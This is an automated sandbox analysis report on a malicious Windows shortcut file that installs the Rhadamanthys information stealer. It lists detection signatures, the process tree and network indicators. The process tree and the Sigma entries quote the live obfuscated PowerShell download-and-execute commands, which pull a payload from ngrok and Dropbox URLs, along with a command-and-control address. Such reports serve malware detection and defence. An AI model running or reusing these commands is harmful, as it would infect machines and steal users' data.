Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
l92fYljXWF.lnk

Overview

General Information

Sample name:l92fYljXWF.lnk
renamed because original name is a hash value
Original sample name:7bf94eeba4e03807a11b7957cbc90442c1066aff96258bed4f2cefc89c66abaa.lnk
Analysis ID:1572664
MD5:bbcc1b77a1f7b345989d06a2d72a2557
SHA1:db11a849bb590f0dc4959eb03c43b9bb8575857c
SHA256:7bf94eeba4e03807a11b7957cbc90442c1066aff96258bed4f2cefc89c66abaa
Tags:Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Detected suspicious crossdomain redirect
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7500 cmdline: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7600 cmdline: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • msedge.exe (PID: 7956 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 2980 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2032,i,11252939231684857170,10877690503001788622,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • cmd.exe (PID: 8188 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\836808032.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7976 cmdline: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • msedge.exe (PID: 9172 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user~1\AppData\Local\Temp\1902382389.pdf MD5: 69222B8101B0601CC6663F8381E7E00F)
            • msedge.exe (PID: 6816 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=2068,i,17729385765362117202,6061086307016693988,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • 1061714629.exe (PID: 9376 cmdline: "C:\Users\user~1\AppData\Local\Temp\1061714629.exe" MD5: DFED8A8BF0531716FD932A0A81CB14CD)
            • 1061714629.exe (PID: 9716 cmdline: "C:\Users\user~1\AppData\Local\Temp\1061714629.exe" MD5: DFED8A8BF0531716FD932A0A81CB14CD)
              • fontdrvhost.exe (PID: 9784 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
                • fontdrvhost.exe (PID: 9952 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
                  • WerFault.exe (PID: 9988 cmdline: C:\Windows\system32\WerFault.exe -u -p 9952 -s 140 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • WerFault.exe (PID: 9856 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 9716 -s 432 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 8100 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 7264 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6700 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8408 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6812 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8604 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7096 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8944 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7816 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5928 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8424 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:6 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 10060 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6992 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/h4qwbjtf.qjde4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000022.00000003.1896994723.0000000000B20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    00000023.00000003.1907247856.00000000052F0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000023.00000003.1907566147.0000000005510000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000023.00000003.1903700839.0000000002DF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          00000022.00000003.1900857144.00000000030D0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            35.3.fontdrvhost.exe.52f0000.6.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              35.3.fontdrvhost.exe.52f0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                34.3.1061714629.exe.30d0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  35.3.fontdrvhost.exe.5510000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    35.3.fontdrvhost.exe.52f0000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 2 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powerup Write Hijack DLL
                      Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7600, TargetFilename: C:\Users\user\AppData\Local\Temp\836808032.bat
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1061714629.exe, ProcessId: 9376, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DiskTuner
                      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7600, TargetFilename: C:\Users\user\AppData\Local\Temp\836808032.bat
                      Sigma detected: PowerShell Web Download
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE", CommandLine: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\836808032.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8188, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE", ProcessId: 7976, ProcessName: powershell.exe
                      Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7500, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing), ProcessId: 7600, ProcessName: powershell.exe
                      Sigma detected: Usage Of Web Request Commands And Cmdlets
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing), ProcessId: 7500, ProcessName: cmd.exe
                      Sigma detected: Use Short Name Path in Command Line
                      Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\836808032.bat" ", CommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\836808032.bat" ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7600, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\836808032.bat" ", ProcessId: 8188, ProcessName: cmd.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7500, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing), ProcessId: 7600, ProcessName: powershell.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8100, ProcessName: svchost.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-10T18:41:32.379441+010028032742Potentially Bad Traffic192.168.2.749726162.125.69.18443TCP
                      2024-12-10T18:41:47.808333+010028032742Potentially Bad Traffic192.168.2.749816162.125.69.18443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-10T18:42:19.820244+010028548021Domain Observed Used for C2 Detected104.161.43.182845192.168.2.749915TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/h4qwbjtf.qjde4"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeReversingLabs: Detection: 55%
                      Multi AV Scanner detection for submitted file
                      Source: l92fYljXWF.lnkReversingLabs: Detection: 23%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Machine Learning detection for sample
                      Source: l92fYljXWF.lnkJoe Sandbox ML: detected

                      Compliance

                      barindex
                      Detected unpacking (creates a PE file in dynamic memory)
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeUnpacked PE file: 31.2.1061714629.exe.2440000.2.unpack
                      Source: unknownHTTPS traffic detected: 18.192.31.165:443 -> 192.168.2.7:49702 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.7:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.7:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.7:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.7:49777 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.7:49794 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.65.15:443 -> 192.168.2.7:49830 version: TLS 1.2
                      Source: Binary string: wkernel32.pdb source: 1061714629.exe, 00000022.00000003.1899986136.0000000002EB0000.00000004.00000001.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1900088763.0000000002FD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: 1061714629.exe, 00000022.00000003.1900857144.00000000030D0000.00000004.00000001.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1900624888.0000000002EB0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000003.1907247856.00000000052F0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: 1061714629.exe, 00000022.00000003.1898574674.0000000002EB0000.00000004.00000001.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1898813591.00000000030A0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000003.1905492118.00000000054E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: 1061714629.exe, 00000022.00000003.1899664093.0000000003050000.00000004.00000001.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1899186910.0000000002EB0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000003.1905951315.00000000052F0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000003.1906206963.0000000005490000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: 1061714629.exe, 00000022.00000003.1898574674.0000000002EB0000.00000004.00000001.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1898813591.00000000030A0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000003.1905492118.00000000054E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: 1061714629.exe, 00000022.00000003.1899664093.0000000003050000.00000004.00000001.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1899186910.0000000002EB0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000003.1905951315.00000000052F0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000003.1906206963.0000000005490000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: 1061714629.exe, 00000022.00000003.1900857144.00000000030D0000.00000004.00000001.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1900624888.0000000002EB0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000003.1907247856.00000000052F0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: 1061714629.exe, 00000022.00000003.1899986136.0000000002EB0000.00000004.00000001.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1900088763.0000000002FD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 4x nop then dec esp39_2_000001C0D3F10511

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 104.161.43.18:2845 -> 192.168.2.7:49915
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://104.161.43.18:2845/7e56fc199c7194d0/h4qwbjtf.qjde4
                      Source: global trafficTCP traffic: 192.168.2.7:49915 -> 104.161.43.18:2845
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeHTTP traffic: Redirect from: www.dropbox.com to https://uc7569213660364555d096b4af3d.dl.dropboxusercontent.com/cd/0/get/cgbrjd1x-qtfcyxpfe412lis9q-hofjumzxgzf722qj69a3ufofqnlbszrkn8vq_nlbyvag5nlgdxnb0ujosks71nm_-vejfe_g56no2muyuk95bqqhxvh1-bg1jw2zoiyuyngdingw4muaig2fzf5vd/file?dl=1#
                      Source: Joe Sandbox ViewIP Address: 162.125.69.18 162.125.69.18
                      Source: Joe Sandbox ViewIP Address: 162.125.69.15 162.125.69.15
                      Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
